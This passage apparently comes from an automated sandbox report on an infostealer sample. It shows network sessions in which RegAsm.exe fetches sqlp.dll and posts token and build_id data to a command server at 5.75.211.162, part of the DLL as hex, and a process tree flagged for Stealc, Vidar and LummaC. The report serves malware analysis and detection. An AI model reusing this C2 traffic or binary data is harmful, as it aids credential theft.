name="token"9896c3e8727994e07377af3f656912b1------GIEBGIIJDGHCBGCBFIEGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEBGIIJDGHCBGCBFIEGCont
2024-09-26 22:16:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49779	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:55 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:55 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:55 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:16:55 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:16:55 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:16:55 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 22:16:56 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49780	5.75.211.162	443	8188	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:16:58 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:16:58 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 38 39 36 63 33 65 38 37 32 37 39 39 34 65 30 37 33 37 37 61 66 33 66 36 35 36 39 31 32 62 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="token"9896c3e8727994e07377af3f656912b1------DAFCAAEGDBKJJKECBKFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DAFCAAEGDBKJJKECBKFHCont
2024-09-26 22:16:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:16:59 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	18:14:56
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x730000
File size:	334'376 bytes
MD5 hash:	CCC8FB5C5637DD0A4D32552BD9203CE6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2070552431.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:14:56
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:14:56
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x580000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:14:56
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.2536324223.000000000132A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAFHDHCAAKE.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Users\userAFHDHCAAKE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userAFHDHCAAKE.exe"
Imagebase:	0x5a0000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2967028725.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGCAEHDBAAE.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Users\userGCAEHDBAAE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userGCAEHDBAAE.exe"
Imagebase:	0xa40000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:15:10
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBGIJEGCGDG.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xda0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000011.00000002.2350258097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Users\userBGIJEGCGDG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userBGIJEGCGDG.exe"
Imagebase:	0x830000
File size:	73'216 bytes
MD5 hash:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000000.2213860525.0000000000832000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\userBGIJEGCGDG.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:15:11
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
